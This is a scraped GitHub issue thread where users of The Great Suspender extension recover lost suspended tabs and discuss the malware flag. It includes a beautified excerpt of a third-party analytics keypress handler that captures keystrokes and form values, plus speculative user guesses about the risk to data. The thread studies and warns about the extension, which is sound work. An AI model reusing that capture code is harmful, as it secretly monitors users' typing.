How do I recover all of my suspended tabs?

I need some help. The extension was forced off by Chrome and I lost all of my tabs. I'm perfectly okay with removing the extension but I want to enable the extension long enough to unsuspend my tabs. How can I recover them? I am at a total loss here.

rip

KODUS to al those in the community who were alert to the suspicious actions by the new owner! And who reported it here (@TheMageKing and others). 👏
Hopefully we can return this repository to the community, or move this great community to a different repository.

@Maximus-42 Had the same issue. Go to your history and the suspended tabs should be there. They wouldn't load, but from the URL you can figure out what the suspended tabs were about.

Those who use The Marvellous Suspender, please let us know how your experience goes with it.

@alkalox Where in my history? I don't see suspended tabs there. They have shown up before, just not now

oof.. I actually don't know what tabs I had suspended now :(

I have started using The Marvellous Suspender, the experience is good for me as of now. can give a try.

Is this as serious as Nano Adblocker and Defender? A bit worried that this could've happened again.

I lost my suspended tabs too. The original post says that the urls can be "extracted from the extension query's". Anyone know how to do that?

@Maximus-42 @ajunkins the actual URL of the site is in the suspended URL, just go to the very end, it's after uri=, copy it out

I just pressed back on my suspended tabs, it worked ok.

looks like everyone just got the notification from chrome

yep, pretty everyone

@Maximus-42 @ajunkins the actual URL of the site is in the suspended URL, just go to the very end it's after uri=, copy it out

Can confirm this works.

@Maximus-42 @ajunkins the actual URL of the site is in the suspended URL, just go to the very end it's after uri=, copy it out

But where do I find the suspended URLs? All of my suspended tabs got closed and they are not in "recently closed".

@Maximus-42 You might have to scroll down to find it. The URL for suspended tabs should be something like chrome-extension://, as another comment said, the website URL of the suspended tab is after uri=

@Maximus-42 @ajunkins the actual URL of the site is in the suspended URL, just go to the very end, it's after uri=, copy it out

The tabs disappear the minute you remove the extension. Is there a way to get them back

@diomidov Mine seemed to be in yesterday's history, a few scrolls down.

How do we extract all previously saved links (not open ones)?

Updated top post, please see #526 for URL recovery help

You can recover the tabs by navigating to your history (chrome://history) and searching for the extension prefix URLs: "chrome-extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html

chrome://history/?q=chrome-extension%3A//klbibkeccnjlkjkiokjodocebajanakg/suspended.html

Also got the notification this was malware and removed from chrome, store page is 404, found some posts on reddit and articles, one linked to this conversation.

Marvellous Suspender seems like a fork from great suspender without tracking, I'll wait a few days before adding it though, but it's probably fine:

https://github.com/gioxx/MarvellousSuspender

(has 20 stars at time of writing on github, we'll see how fast that shoots up by tomorrow lol)

The extension being blocked just completely nuked every tab I had suspended.

The extension being blocked just completely nuked every tab I had suspended.

https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773514532

Ha. The sudden influx of people due to the active blocking during a workday.

For those asking for alternatives, I might recommend https://workona.com/tab-manager/. It does more than just suspend tabs (that you may find useful), but it's a good tab suspender too. (Full disclosure: I work for Workona, but I was a long-time user of its tab suspension before I started working there :-) )

Does this mean any of my passwords or personal data could be compromised? Should I take any actions?
I stopped using it a few weeks back since Edge's new suspender feature was introduced.

i've muted this. please @ me to get my attention

All I see are comments about getting tabs back, and not what data was stolen

@Atomika, just click the back button, it'll bring your page back

This has happened so many times when an independent developer sells a browser extension.

If you (the reader of this comment) ever find yourself in a situation of being offered a substantial sum of money for an extension that you don't really want to maintain anymore, you have to understand that it is extremely unethical to transfer ownership without very thorough vetting of the party control is being transferred to.

This same thing has played out time and time again. _Please_, let's all work together to spread this information and do our part to prevent it from happening again. It makes me sick to see that history just keeps repeating itself here.

No offense to the original maintainer; I am just very frustrated this continues happen when it is avoidable and should not ever happen.

Yes, people could stop complaining about tabs as they're recoverable by pressing back button or by looking into the URL that still has the the original URL.

Now, what data could have been stolen by this?

what do you guys think about The Great Discarder https://chrome.google.com/webstore/detail/the-great-discarder/jlipbpadkjcklpeiajndiijbeieicbdh
?

You guys are life (tab!) savers. Thank you

I can't believe this -- I WAS SOUNDING THE ALARM ABOUT THIS MONTHS AGO

Hey @TheMageKing !

I had this extension installed but turned off in a disabled state. Am I affected?

Wish I had known about this sooner, I really should check out all other extensions I have 🤔

I can't believe this -- I WAS SOUNDING THE ALARM ABOUT THIS MONTHS AGO

That's the problem. How would any user of TGS know about the issues? There's simply no way to notify extension's users...

Now, what data could have been stolen by this?

Pretty much what I'm wondering right now

Sick to my stomach thinking about all the personal data that was surreptitiously stolen from me over the last few months.

Hey @TheMageKing !

I had this extension installed but turned off in a disabled state. Am I affected?

Probably not

Do I need to worry about any of my data or passwords being stolen?

@superluig164 they say it was advertising fraud, but who knows...

Yes, people could stop complaining about tabs as they're recoverable by pressing back button or by looking into the URL that still has the the original URL.

Now, what data could have been stolen by this?

Not necessarily. Refreshing twice makes Chrome overwrite the URL with some generic "invalid" URL thing.

Was bitten by this _literally just now_ and am _not_ looking forward to the pain of killing the extension and restoring the tab. At the very least, I'll lose the back button.

And if the session crashes for any reason...

this is worrying

@deanoemcke You and I have been together a long time, you know? This extension has been part of my daily life for years. I respect you for having made such an incredible piece of software, one I have relied on without issue for as long as I care to remember. But why, _why_ would you sell it to someone who was so clearly shady? Was it not shady at first and became that way, or was it shady from the beginning? We could be talking about the mass harvesting of identity and banking information from millions of people here.

@thibaudcolas @joepie91 @zanglang y'all got further into the analysis than I, can you help enlighten everyone on the details of what the remote JS did?

Do Chromium extensions have access to the filesystem in general, or is the scope limited to just browser stuff?

This is sad and unfortunate

It seems like all the decent extensions slowly devolve into shady stuff/scams these days...

Chrome just forcibly removed the extension on my client. Didn't know this have security concerns.

Now is there an extension that disables extensions like these (taken over from original maintainer) that are possibly malware long before Google takes them down?

Chrome just forcibly removed the extension on my client. Didn't know this have security concerns.

Same, I didn't get a chance to prepare :(

I just pressed back on my suspended tabs, it worked ok.

all of the suspended tabs disappeared when Chrome Web Store yanked the extension and marked it malware

I was incredibly alarmed by not knowing this until Google removed it and prompt me 10 min ago. Now I am worried about information theft/security breach. Any suggestions on knowing in advance? (e.g. had I seen this GitHub issue 2 months ago I would have removed TGS from chrome back then).

Genuine question for those who know (could be useful for everyone)

What info does this extension have malicious access too? Could it, in theory, have got access to unencrypted passwords stored in Chrome?

Genuine question for those who know (could be useful for everyone)

What info does this extension have malicious access too? Could it, in theory, have got access to unencrypted passwords stored in Chrome?

Yeah my concern too

It was only for analytics propose or was it also a password stealer/cpu mining or something else?

When it doubt... change it out.

Do Chromium extensions have access to the filesystem in general, or is the scope limited to just browser stuff?

They can access the filesystem if they request those permissions, but I do not think that's the case here.

Genuine question for those who know (could be useful for everyone)
What info does this extension have malicious access too? Could it, in theory, have got access to unencrypted passwords stored in Chrome?

Yeah my concern too

AFAIK there is no permission set for passwords, I believe those are kept at the browser level and there is no API to access them.

what is happening with this extension I was using it till just now and delete it because chrome says this extension is malicious. and try to find prove as google saying true or not and found this post and what I see is this post was posted on November 3 2020 and
I am now is confuse what to do without this extension is there any alternative?

what is happening with this extension I was using it till just now and delete it because chrome says this extension is malicious. and try to find prove as google saying true or not and found this post and what I see is this post was posted on November 3 2020 and
I am now is confuse what to do without this extension is there any alternative?

I'll be using The Marvellous Suspended - a track free fork of TGS

As posted in the OP, user @aciidic went ahead and created a repo without the tracking. It has 190 stars. Can't speak for it though, just letting people know about it as an alternative.

https://github.com/aciidic/thegreatsuspender-notrack

shoutout to @aciidic for creating his own version, works great.

@faraidoon123 If you are looking to restore lost tabs try https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773514532

It was only for analytics propose or was it also a password stealer/cpu mining or something else?

If it was CPU mining you'd know it because the CPU would stay pegged. As for password stealing, there is a reasonable likelihood that was taking place. The research by others in this thread unearthed an onKeyPress listener that would capture every keystroke, not difficult to assemble keystrokes into passwords from there.

This is a nightmare.

I was sounding the alarm on this back in May of last year -- https://github.com/greatsuspender/thegreatsuspender/issues/1147

As posted in the OP, user aciidic went ahead and created a repo without the tracking. It has 190 stars. Can't speak for it though, just letting people know about it as an alternative.

aciidic/thegreatsuspender-notrack

Need to post it as a separate, new repo. Forking on Github is dangerous in case the owners decide to kill things or something...
@aciidic

@rex Any way to confirm what permissions it has/had? (I have backups I can analyse...)

Is a complete password reset of all the websites I use a good way to mitigate the damage from possible data theft by the extension or is it overkill? Any suggestions? I wasn't even aware that I was still using this extension but I guess it was attached to my Google profile and got installed when I logged into Chrome and turned on sync.

I might just be blind, but https://github.com/greatsuspender/thegreatsuspender/issues/526 doesn't seem to actually tell you how to recover all saved sessions and tabs from IndexedDB externally (like getting a list of all the links in plaintext).

Does anyone know how to actually do that?

Can we assume that passwords are compromised? What about CC data entered on websites/saved in chrome?

executed code from an untrusted third-party on your computer, with the power to modify any and all websites that you see

Could this mean that passwords or other sensitive data was scraped?

FYI I've running an anti-malware scan as we speak - its already detected 2x malicious tracking cookies. I imagine these are linked to TGS however cannot confirm.

Although tracking cookies in themselves are generally safe and normal to have, if you have malicious ones your anti-virus will probably pick up on them (as in this case).

To be on the safe side I recommend you all run an anti-malware scan

how to recover all saved sessions and tabs from IndexedDB externally (like getting a list of all the links in plaintext).
Does anyone know how to actually do that?

https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773514532

@rex Any way to confirm what permissions it has/had? (I have backups I can analyse...)

Look at manifest.json to permissions

WTF? Is there a summary on what kinds of data may have been compromised? Should we be changing passwords?

Why did it take Google 3-4+ mo to remove this?

how to recover all saved sessions and tabs from IndexedDB externally (like getting a list of all the links in plaintext).
Does anyone know how to actually do that?

#1263 (comment)

That does not help. I'm talking about the saved sessions, not all the suspended tabs ever (I have probably 10s of thousands of those).

@rex Any way to confirm what permissions it has/had? (I have backups I can analyse...)

Unfortunately not that I'm aware of. Obviously you could look at the manifest.json in this repo but once it became clear they were deploying updates packaged from code outside this repo the only way would be to get one of those tarballs and unpack it and look.

I was sounding the alarm on this back in May of last year -- #1147

You've said it about 10 times already mate. I don't honestly think people care who raised the alarm when - people just wanna make sure their stuff is safe and secure :)

Is a complete password reset of all the websites I use a good way to mitigate the damage from possible data theft by the extension or is it overkill? Any suggestions? I wasn't even aware that I was still using this extension but I guess it was attached to my Google profile and got installed when I logged into Chrome and turned on sync.

It's a start, to be sure, but unfortunately it all depends on whether this was an actual _harvesting campaign_ or not. If it was, and our identity information was harvested, then we've all got a lot bigger problems than passwords.

Edit: To be clearer, I am suggesting that if our identities were stolen then we're looking at locking credit files, monitoring for usage of our social security numbers, applications for credit cards, the works.

This is still in my Chromium profile for the (now disabled) extension:

    "permissions": [
        "tabs",
        "storage",
        "history",
        "unlimitedStorage",
        "webRequest",
        "webRequestBlocking",
        "http://*/*",
        "https://*/*",
        "file://*/*",
        "chrome://favicon/*",
        "https://greatsuspender.github.io/",
        "contextMenus",
        "cookies"
    ],

how to recover all saved sessions and tabs from IndexedDB externally (like getting a list of all the links in plaintext).
Does anyone know how to actually do that?

#1263 (comment)

That does not help. I'm talking about the saved sessions, not all the suspended tabs ever (I have probably 10s of thousands of those).

I don't think that's possible. But history is sorted by date, and you probably aren't interested in recovering tabs that you had suspended for over a year. So just look at the last few hundred urls.

As a quick workaround to recover your tabs, just look in the URL bar and delete everything up to and including &uri= :

Chrome disabled it but then it came right back up a few minutes later while I was reading this thread! So I manually removed the extension. Thanks all for documenting the issue.

This is still in my Chromium profile for the (now disabled) extension:

    "permissions": [
        "tabs",
        "storage",
        "history",
        "unlimitedStorage",
        "webRequest",
        "webRequestBlocking",
        "http://*/*",
        "https://*/*",
        "file://*/*",
        "chrome://favicon/*",
        "https://greatsuspender.github.io/",
        "contextMenus",
        "cookies"
    ],

Good thinking. The good news is that that doesn't allow filesystem access. The bad news is of course that it can still have harvested every keystroke on every website we visited.

The good news is that that doesn't allow filesystem access.

Not even the "file://*/*" part?

I have updated the top post once more. For those hoping to analyze the extension, please do read through it: it may be long, but it is detailed. Posts further up in this history have more details on the analyses that they attempted. We do not believe that most users of Great Suspender, especially those who only used it recently, are severely impacted.

I hope that Google will do a press release of some sort soon, explaining if there are any harmful behaviors not described here. For those who have been with this issue since May, October, or January (the three big spikes in people noticing), we know you knew for a while. We don't need to rub it in even more: we can just live with the knowledge that we were ahead of the curve.

how to recover all saved sessions and tabs from IndexedDB externally (like getting a list of all the links in plaintext).
Does anyone know how to actually do that?

#1263 (comment)

That does not help. I'm talking about the saved sessions, not all the suspended tabs ever (I have probably 10s of thousands of those).

I don't think that's possible. But history is sorted by date, and you probably aren't interested in recovering tabs that you had suspended for over a year. So just look at the last few hundred urls.

Once again I have no use for the "latest" suspended tabs, I have saved sessions from a long time ago that I find useful. So it sounds like what I need isn't possible?

The good news is that that doesn't allow filesystem access.

Not even the "file://*/*" part?

Negative. Filesystem access requires a specific permission in manifest.json. file://*/* just means the extension can execute code on pages that start with file://, so if you were browsing files through your browser (which is possible, try it out). Nothing to worry about there.

It was only for analytics propose or was it also a password stealer/cpu mining or something else?

The key-press handler appears to explicitly skip over any input or password tags, but add events for other keypresses (which are likely intended to be tab/enter/spacebar outside of text input).

Concerningly, doesn't exclude tags, which would mean it was capturing events from your sent e-mail contents, etc.</strong></p> <p>Also, and <strong>most importantly</strong>, since this is the CURRENT minified JS code, <strong>we have no idea what it could have included in the past or for a subset of users</strong>.</p> <pre><code class="prettyprint"> keypressEventHandler: function(e) { e = e || window.event; var targ = this._getTarget(e); if (targ.tagName === "INPUT" && targ.type === "password") { return } var key_code = e.keyCode ? e.keyCode : e.charCode; var key_value = String.fromCharCode(key_code); var event = new OWA.event; event.setEventType("dom.keypress"); event.set("key_value", key_value); event.set("key_code", key_code); event.set("dom_element_name", targ.name); event.set("dom_element_value", targ.value); event.set("dom_element_id", targ.id); event.set("dom_element_tag", targ.tagName); this.addToEventQueue(event) }, </code></pre> <p>From <a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a> run through <a rel="nofollow noopener" target="_blank" href="https://beautifier.io/">https://beautifier.io/</a> . Again, who knows what iterations were used over the past months, but seeing that there are explicit exceptions at some point gives marginally more comfort.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7321259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michaelkrieger picture"> <strong>michaelkrieger</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">13</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong> I read through most of the technical analysis above, I am <strong>extremely</strong> concerned by the discovery of the <code>onKeyPress</code> listener you guys found. As long as the extension can listen to key strokes, it is trivial to collect those and ship them to a server for reassembly. What makes you think this is innocent? I apologize in advance if that sounds like I'm being an ass or angry or anything, just not sure how else to ask a direct question.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Handled like a nuke. Not even an option to revert to an "okay" version of the extension. Google thinks extensions can never have info stored that the user might want to recover... So just nuke everything.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5769148?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="munael picture"> <strong>munael</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@michaelkrieger</strong> that makes me feel a little better, though obviously the potential for abuse here is still extremely high. </p> <p>Edit: Was that from this repo or from an unpacked version that was recently distributed from unknown sources?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Thank god for 2FA</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4701756?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="1oh1 picture"> <strong>1oh1</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>I just got a notice saying that The Great Suspender has malware by Google Chrome itself.</p> </blockquote> <p>Yes, I just got that notification, too.</p> <p>I'd really like to know…</p> <h2>What triggered <strong>@google</strong> / <strong>@chromium</strong> to ban The Great Suspender <strong>_NOW_</strong>?</h2> <p>As a user of this extension for a few years, I am really annoyed that this extension wasn't banned much earlier, given the history I've read here.</p> <p>I'm so glad I didn't contribute any money to the developer's PayPal account.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/20786?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lsloan picture"> <strong>lsloan</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Sounds like the biggest concern is probably cookies. I suggest manually logging out of all websites and then clearing your cookies.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@michaelkrieger</strong> that makes me feel a little better, though obviously the potential for abuse here is still extremely high.</p> <p>Edit: Was that from this repo or from an unpacked version that was recently distributed from unknown sources?</p> </blockquote> <p>From <a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a> run through <a rel="nofollow noopener" target="_blank" href="https://beautifier.io/">https://beautifier.io/</a> . Again, who knows what iterations were used over the past months, but seeing that there are explicit exceptions at some point gives marginally more comfort.</p> <p>Updated my post with the source to help anyone reading through.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7321259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michaelkrieger picture"> <strong>michaelkrieger</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>On MacOS, one can use Time Machine to restore a slightly older version of the Chrome profile(s) in question. They are stored in <code>/Users/{USERNAME}/Library/Application Support/Google/Chrome/{Default|Profile 1|Profile 2|...}</code>. Chrome must be closed during this operation. I did this for two profiles, and had all my tabs back. Even Great Suspender worked for 2-3 minutes until it got banned again, so be careful! This gave me ample time to reactivate all my tabs.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/516888?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="adriangligor picture"> <strong>adriangligor</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Woah... FLOOD of comments... Everyone needs to calm down. This same risk is present regardless of extension depending on the permissions you ALLOW it. It does look like TGS was pulled from the chrome web store again.</p> <p>EDIT: Just saw that TGS (even the legitimate version) does ask for file:// access... I assume there is a legitimate use for it... but having this opened DOES open up a number of security vulnerabilities.</p> <p>People shouldn't panic about tracking cookies, you almost certainly have hundreds or thousands of them currently on your computer. Clear your cookies if you're worried about being tracked. A tracking cookie is the least of the security concerns posed by this. That's just a privacy concern. The ability to access things on your filesystem is the bigger security implication. (Still new to extension coding so someone can correct me if I'm reading the manifest wrong...)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p><strong>@michaelkrieger</strong> that makes me feel a little better, though obviously the potential for abuse here is still extremely high.<br /> Edit: Was that from this repo or from an unpacked version that was recently distributed from unknown sources?</p> </blockquote> <p>From <a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a> run through <a rel="nofollow noopener" target="_blank" href="https://beautifier.io/">https://beautifier.io/</a> . Again, who knows what iterations were used over the past months, but seeing that there are explicit exceptions at some point gives marginally more comfort.</p> </blockquote> <p>I found 2 snapshots on The Wayback Machine: <a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/">https://web.archive.org/web/</a>*/<a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4701756?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="1oh1 picture"> <strong>1oh1</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> 🚀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>As already said in here, I recovered my tabs following these steps:</p> <ol> <li>Go to your Chrome history (chrome://history) or press the shortcut <code>Ctrl+H</code>:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942573-1b914480-6703-11eb-8b79-4c9ac0083e43.png" alt="image" /></li> <li>Search for the extension prefix URLs: <code>chrome-extension://klbibkeccnjlkjkiokjodocebajanakg/suspended.html</code><br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942008-652d5f80-6702-11eb-97ea-d3d3c7f74026.png" alt="image" /></li> <li>Open the tabs you need (or all of them). It will appear some "bugged" links like this:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942162-9c037580-6702-11eb-98d9-3400f604b251.png" alt="image" /></li> <li>Remove the link part up to <code>&uri=</code>:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942327-d1a85e80-6702-11eb-8bf8-aa7546d1c5bb.png" alt="image" /></li> <li>You now have your recovered link:<br /> <img loading="lazy" src="https://user-images.githubusercontent.com/2280432/106942398-e8e74c00-6702-11eb-90b7-2d22203d9b9b.png" alt="image" /></li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2280432?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Riverlance picture"> <strong>Riverlance</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">16</span> 🚀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>As a quick workaround to recover your tabs, just look in the URL bar and delete everything up to and including <code>&uri=</code> :</p> </blockquote> <p>In my case, I had locked my computer and walked away for a lunch break. When I returned, I saw the malware notification, but also all my tabs that had been suspended were <strong>_gone_</strong>. I have no chance to recover the tabs. I'll have to make do by using the browser history, I guess.</p> <p><strong>_Edit:_</strong> Using the steps from <strong>@Riverlance</strong>'s example <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-773538665">above</a>, I was able to see URLs of my tabs that had been suspended. I had been writing my comment while his was posted. (BTW, nice name, Riverlance. 😉)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/20786?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lsloan picture"> <strong>lsloan</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I also found that the extension was gone after coming back from lunch. In my case the tabs are not gone, but all of them are unusable because of the prefix the extension added. I know I can simply click Back or edit the URL in the address bar, but I have over 200 opened. Is there another extension or script to do that? @_@</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3179605?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="aruku picture"> <strong>aruku</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@minig0d</strong> I would be happy to calm down, in fact I desperately want to. My concern lies mostly in the circumstances - the new publisher has clearly gone out of their way to do some shady things, IMO there's no reason to suspect they were acting in good faith or limiting their shadiness to just adding tracking. And knowing there's almost nothing to be done about whatever _may_ have happened at this point makes me feel physically ill. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This is <a rel="nofollow noopener" target="_blank" href="https://github.com/dominictarr/event-stream/issues/116">dominictarr/event-stream#116</a> all over again :(</p> <p><strong>@rex</strong> Same</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/32376686?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TacoTheDank picture"> <strong>TacoTheDank</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1304#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1304#issuecomment</a>-773534043<br /> this method worked perfectly !!!!!!! i export all my tabs through this method !!! try it</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/43269183?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="scarrrr316 picture"> <strong>scarrrr316</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p><strong>@michaelkrieger</strong> that makes me feel a little better, though obviously the potential for abuse here is still extremely high.<br /> Edit: Was that from this repo or from an unpacked version that was recently distributed from unknown sources?</p> </blockquote> <p>From <a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a> run through <a rel="nofollow noopener" target="_blank" href="https://beautifier.io/">https://beautifier.io/</a> . Again, who knows what iterations were used over the past months, but seeing that there are explicit exceptions at some point gives marginally more comfort.</p> </blockquote> <p>I found 2 snapshots on The Wayback Machine: <a rel="nofollow noopener" target="_blank" href="https://web.archive.org/web/">https://web.archive.org/web/</a>*/<a rel="nofollow noopener" target="_blank" href="https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js">https://cdn.owebanalytics.com/owa/modules/base/js/owa.tracker-combined-latest.minified.js</a></p> </blockquote> <p>Both appear to not have changes to this section... which reassures me a bit as to password safety.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7321259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michaelkrieger picture"> <strong>michaelkrieger</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Sorry in advance if this is a dumb question but is there a way to find out if the extension was already disabled before it was removed by Chrome? If yes, can I find out when it was disabled?</p> <p>Edit: I just noticed that disabled extensions are also auto-updated by Chrome.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4701756?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="1oh1 picture"> <strong>1oh1</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 